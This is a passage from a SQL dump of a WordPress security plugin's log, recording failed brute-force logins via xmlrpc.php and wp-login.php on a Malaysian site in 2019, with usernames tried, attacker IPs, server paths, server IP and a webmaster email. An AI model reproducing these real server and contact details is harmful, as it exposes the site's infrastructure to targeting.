password</a>?\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:14:\"bintara.com.my\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:39:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/blog/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"358\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_ACCEPT_CHARSET\";s:30:\"utf-8,ISO-8859-2;q=0.8,*;q=0.7\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:37:\"http://bintara.com.my/blog/xmlrpc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/blog/xmlrpc.php\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XWQoqRTEVi0fEJEHuDZEAgAAAA4\";s:12:\"REDIRECT_URL\";s:16:\"/blog/xmlrpc.php\";s:11:\"REMOTE_ADDR\";s:11:\"80.91.52.30\";s:11:\"REMOTE_PORT\";s:5:\"45930\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:37:\"http://bintara.com.my/blog/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:16:\"/blog/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWQoqRTEVi0fEJEHuDZEAgAAAA4\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566845097.8126\";s:12:\"REQUEST_TIME\";s:10:\"1566845097\";}}','notice','2019-08-26 18:45:00','2019-08-26 18:44:58',18300992,19500480,'http://bintara.com.my/blog/xmlrpc.php',1,0,'80.91.52.30'),(23191,0,'brute_force','invalid-login::username-bintara.com.my','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:18:\"incorrect_password\";a:1:{i:0;s:196:\"<strong>ERROR</strong>: The username or password you entered is incorrect. <a href=\"https://bintara.com.my/wp-login.php?action=lostpassword\" title=\"Password Lost and Found\">Lost your password</a>?\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:14:\"bintara.com.my\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:39:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/blog/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"360\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_ACCEPT_CHARSET\";s:30:\"utf-8,ISO-8859-2;q=0.8,*;q=0.7\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:37:\"http://bintara.com.my/blog/xmlrpc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/blog/xmlrpc.php\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XWQo7B90bn5mtr-PXqqzlAAAAFM\";s:12:\"REDIRECT_URL\";s:16:\"/blog/xmlrpc.php\";s:11:\"REMOTE_ADDR\";s:13:\"45.40.164.164\";s:11:\"REMOTE_PORT\";s:5:\"39487\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:37:\"http://bintara.com.my/blog/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:16:\"/blog/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWQo7B90bn5mtr-PXqqzlAAAAFM\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1566845164.367\";s:12:\"REQUEST_TIME\";s:10:\"1566845164\";}}','notice','2019-08-26 18:46:07','2019-08-26 18:46:04',18303288,19504160,'http://bintara.com.my/blog/xmlrpc.php',1,0,'45.40.164.164'),(23192,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:18:\"incorrect_password\";a:1:{i:0;s:196:\"<strong>ERROR</strong>: The username or password you entered is incorrect. <a href=\"https://bintara.com.my/wp-login.php?action=lostpassword\" title=\"Password Lost and Found\">Lost your password</a>?\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:39:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/blog/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"337\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_ACCEPT_CHARSET\";s:30:\"utf-8,ISO-8859-2;q=0.8,*;q=0.7\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:37:\"http://bintara.com.my/blog/xmlrpc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/blog/xmlrpc.php\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XWQpDxTEVi0fEJEHuDZENgAAAAc\";s:12:\"REDIRECT_URL\";s:16:\"/blog/xmlrpc.php\";s:11:\"REMOTE_ADDR\";s:13:\"176.32.230.19\";s:11:\"REMOTE_PORT\";s:5:\"41318\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:37:\"http://bintara.com.my/blog/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:16:\"/blog/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWQpDxTEVi0fEJEHuDZENgAAAAc\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566845199.9406\";s:12:\"REQUEST_TIME\";s:10:\"1566845199\";}}','notice','2019-08-26 18:46:41','2019-08-26 18:46:40',18301016,19500624,'http://bintara.com.my/blog/xmlrpc.php',1,0,'176.32.230.19'),(23193,0,'brute_force','invalid-login::username-bintara.com.my','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:18:\"incorrect_password\";a:1:{i:0;s:196:\"<strong>ERROR</strong>: The username or password you entered is incorrect. <a href=\"https://bintara.com.my/wp-login.php?action=lostpassword\" title=\"Password Lost and Found\">Lost your password</a>?\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:14:\"bintara.com.my\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:39:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/blog/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"355\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_ACCEPT_CHARSET\";s:30:\"utf-8,ISO-8859-2;q=0.8,*;q=0.7\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:37:\"http://bintara.com.my/blog/xmlrpc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/blog/xmlrpc.php\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XWQp4B90bn5mtr-PXqqzuAAAAEw\";s:12:\"REDIRECT_URL\";s:16:\"/blog/xmlrpc.php\";s:11:\"REMOTE_ADDR\";s:13:\"198.71.235.51\";s:11:\"REMOTE_PORT\";s:5:\"56846\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:37:\"http://bintara.com.my/blog/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:16:\"/blog/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWQp4B90bn5mtr-PXqqzuAAAAEw\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1566845408.101\";s:12:\"REQUEST_TIME\";s:10:\"1566845408\";}}','notice','2019-08-26 18:50:10','2019-08-26 18:50:08',18296136,19496824,'http://bintara.com.my/blog/xmlrpc.php',1,0,'198.71.235.51'),(23194,0,'brute_force','invalid-login::username-bintara.com.my','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:18:\"incorrect_password\";a:1:{i:0;s:196:\"<strong>ERROR</strong>: The username or password you entered is incorrect. <a href=\"https://bintara.com.my/wp-login.php?action=lostpassword\" title=\"Password Lost and Found\">Lost your password</a>?\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:14:\"bintara.com.my\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:39:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/blog/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"359\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_ACCEPT_CHARSET\";s:30:\"utf-8,ISO-8859-2;q=0.8,*;q=0.7\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:37:\"http://bintara.com.my/blog/xmlrpc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/blog/xmlrpc.php\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XWQp4Q0@TGWC-1tzGX5cMwAAAIA\";s:12:\"REDIRECT_URL\";s:16:\"/blog/xmlrpc.php\";s:11:\"REMOTE_ADDR\";s:15:\"211.149.198.246\";s:11:\"REMOTE_PORT\";s:5:\"28148\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:37:\"http://bintara.com.my/blog/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:16:\"/blog/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWQp4Q0@TGWC-1tzGX5cMwAAAIA\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566845409.9787\";s:12:\"REQUEST_TIME\";s:10:\"1566845409\";}}','notice','2019-08-26 18:50:13','2019-08-26 18:50:10',18302328,19492632,'http://bintara.com.my/blog/xmlrpc.php',1,0,'211.149.198.246'),(23195,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:18:\"incorrect_password\";a:1:{i:0;s:196:\"<strong>ERROR</strong>: The username or password you entered is incorrect. <a href=\"https://bintara.com.my/wp-login.php?action=lostpassword\" title=\"Password Lost and Found\">Lost your password</a>?\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:39:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:21:\"/wordpress/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"342\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_ACCEPT_CHARSET\";s:30:\"utf-8,ISO-8859-2;q=0.8,*;q=0.7\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:42:\"http://bintara.com.my/wordpress/xmlrpc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:21:\"/wordpress/xmlrpc.php\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XWQp5Q0@TGWC-1tzGX5cNAAAAJY\";s:12:\"REDIRECT_URL\";s:21:\"/wordpress/xmlrpc.php\";s:11:\"REMOTE_ADDR\";s:13:\"176.32.230.24\";s:11:\"REMOTE_PORT\";s:5:\"60442\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:42:\"http://bintara.com.my/wordpress/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:21:\"/wordpress/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWQp5Q0@TGWC-1tzGX5cNAAAAJY\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566845414.0142\";s:12:\"REQUEST_TIME\";s:10:\"1566845414\";}}','notice','2019-08-26 18:50:16','2019-08-26 18:50:14',18302064,19505424,'http://bintara.com.my/wordpress/xmlrpc.php',1,0,'176.32.230.24'),(23196,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:18:\"incorrect_password\";a:1:{i:0;s:196:\"<strong>ERROR</strong>: The username or password you entered is incorrect. <a href=\"https://bintara.com.my/wp-login.php?action=lostpassword\" title=\"Password Lost and Found\">Lost your password</a>?\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:39:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:21:\"/wordpress/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"342\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_ACCEPT_CHARSET\";s:30:\"utf-8,ISO-8859-2;q=0.8,*;q=0.7\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:42:\"http://bintara.com.my/wordpress/xmlrpc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:21:\"/wordpress/xmlrpc.php\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XWQqDA0@TGWC-1tzGX5cNQAAAJQ\";s:12:\"REDIRECT_URL\";s:21:\"/wordpress/xmlrpc.php\";s:11:\"REMOTE_ADDR\";s:15:\"192.241.217.114\";s:11:\"REMOTE_PORT\";s:5:\"45734\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:42:\"http://bintara.com.my/wordpress/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:21:\"/wordpress/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWQqDA0@TGWC-1tzGX5cNQAAAJQ\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566845452.2835\";s:12:\"REQUEST_TIME\";s:10:\"1566845452\";}}','notice','2019-08-26 18:50:55','2019-08-26 18:50:52',18308088,19590056,'http://bintara.com.my/wordpress/xmlrpc.php',1,0,'192.241.217.114'),(23197,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"123.31.26.182\";s:11:\"REMOTE_PORT\";s:5:\"42038\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWQqMBTEVi0fEJEHuDZErwAAABg\";s:8:\"PHP_SELF\";s:13:\